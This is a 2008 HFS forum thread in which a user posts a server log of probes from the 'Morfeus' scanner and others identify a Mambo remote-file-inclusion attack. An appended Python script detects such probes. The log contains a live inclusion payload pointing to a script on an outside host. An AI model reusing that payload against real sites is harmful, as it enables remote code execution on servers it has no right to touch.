rejetto forum

Software => HFS ~ HTTP File Server => Topic started by: Pit on November 17, 2008, 05:42:21 PM

Title: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: Pit on November 17, 2008, 05:42:21 PM
For much of today my webserver was scanned by "Morfeus Fucking Scanner".
This is a part of the log:

17.11.2008 16:54:10 194.165.49.36:50035 Connected
17.11.2008 16:54:10 194.165.49.36:50035 Disconnected
17.11.2008 16:56:10 194.165.49.36:46236 Connected
17.11.2008 16:56:10 194.165.49.36:46236 Requested GET /?mosConfig_absolute_path=http://host.nikoniqdesigns.com/~silverso/c.in??/
17.11.2008 16:56:10 194.165.49.36:46236 Request dump
> GET /?mosConfig_absolute_path=http://host.nikoniqdesigns.com/~silverso/c.in??/ HTTP/1.1
> Accept: */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Morfeus Fucking Scanner
> Host: 91.37.233.251
> Connection: Close
17.11.2008 16:56:10 194.165.49.36:46236 Served 3,61 KB
17.11.2008 16:56:10 194.165.49.36:46236 Disconnected by server - 3693 bytes sent
17.11.2008 16:56:10 194.165.49.36:46363 Connected
17.11.2008 16:56:10 194.165.49.36:46363 Disconnected by server - 1822 bytes sent
17.11.2008 16:56:10 194.165.49.36:46439 Connected
17.11.2008 16:56:10 194.165.49.36:46439 Disconnected by server - 1822 bytes sent
17.11.2008 16:56:11 194.165.49.36:46512 Connected
17.11.2008 16:56:11 194.165.49.36:46512 Disconnected by server - 1823 bytes sent
17.11.2008 16:56:11 194.165.49.36:46590 Connected
17.11.2008 16:56:11 194.165.49.36:46590 Disconnected by server - 1823 bytes sent


Does anyone know anything about "Morfeus Fucking Scanner", and is it a risk for HFS?
Title: Re: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: rejetto on November 17, 2008, 06:05:17 PM
never heard, and it's not a risk IMO.
with event scripts you can even ban it, just to get a cleaner log.
but if it comes from a single IP you can just ban the ip, easier.
Title: Re: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: Pit on November 17, 2008, 06:07:03 PM
That was the first thing that I did. I think it is a DDoS attack.
Title: Re: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: rejetto on November 17, 2008, 06:09:15 PM
or maybe it is just searching for buggy IIS
Title: Re: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: SilentPliz on November 17, 2008, 06:09:47 PM
Morfeus is a scanner that looks for vulnerabilities in PHP based web sites (bot).

I don't think it could be a danger to HFS.

Title: Re: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: rejetto on November 17, 2008, 06:15:48 PM
a quick search on google will reveal that mosConfig_absolute_path is an attack on mambo (cms) installations
Title: Re: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: Pit on November 17, 2008, 06:20:17 PM
Thanks for your replies and have a nice evening.
Title: Re: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: SilentPliz on November 17, 2008, 06:24:42 PM
Thanks for your replies and have a nice evening.

Thank you, to you too. :)
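
An added example, not part of the thread and not HFS code: a Python check for the two signals visible in the log in the first post, the scanner's User-Agent and a query parameter whose value is a remote URL (the mosConfig_absolute_path probe). The sample lines are constructed in the same log format with documentation addresses; `find_probes`, the agent list and the regexes are names and choices made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in the log format shown in the first post
# (documentation IP ranges and example hosts, not real indicators).
SAMPLE_LOG = """\
17.11.2008 16:56:10 203.0.113.7:46236 Connected
17.11.2008 16:56:10 203.0.113.7:46236 Requested GET /?mosConfig_absolute_path=http://files.example.net/c.txt??/
17.11.2008 16:56:10 203.0.113.7:46236 Request dump
> GET /?mosConfig_absolute_path=http://files.example.net/c.txt??/ HTTP/1.1
> User-Agent: Morfeus Fucking Scanner
17.11.2008 16:56:10 203.0.113.7:46236 Disconnected by server - 3693 bytes sent
17.11.2008 16:57:02 198.51.100.99:51200 Requested GET /music/?sort=name
17.11.2008 16:57:02 198.51.100.99:51200 Request dump
> GET /music/?sort=name HTTP/1.1
> User-Agent: Mozilla/5.0
"""

EVENT = re.compile(r"^\d{2}\.\d{2}\.\d{4} \d{2}:\d{2}:\d{2} (\S+):\d+ (.*)$")
REQUEST = re.compile(r"^Requested (?:GET|POST|HEAD) (\S+)")
SCANNER_AGENTS = ("morfeus",)               # substring match, lower-cased
REMOTE_VALUE = re.compile(r"^(?:https?|ftp)://", re.I)

def find_probes(log_text):
    """Return {client_ip: set(reasons)} for requests that look like scanner probes."""
    hits = defaultdict(set)
    ip = None                               # client that owns the following "> " dump lines
    for line in log_text.splitlines():
        if line.startswith("> "):
            name, _, value = line[2:].partition(":")
            if ip and name.lower() == "user-agent" and any(
                    s in value.lower() for s in SCANNER_AGENTS):
                hits[ip].add("scanner user-agent")
            continue
        m = EVENT.match(line)
        if not m:
            continue
        ip, message = m.groups()
        req = REQUEST.match(message)
        if req:
            # A parameter whose value is itself a URL is the remote-inclusion probe pattern.
            for key, value in parse_qsl(urlsplit(req.group(1)).query):
                if REMOTE_VALUE.match(value):
                    hits[ip].add("remote URL in parameter " + key)
    return dict(hits)

if __name__ == "__main__":
    print(find_probes(SAMPLE_LOG))
```

The returned addresses are candidates for the IP ban rejetto mentions; the ordinary browser request in the sample is not flagged.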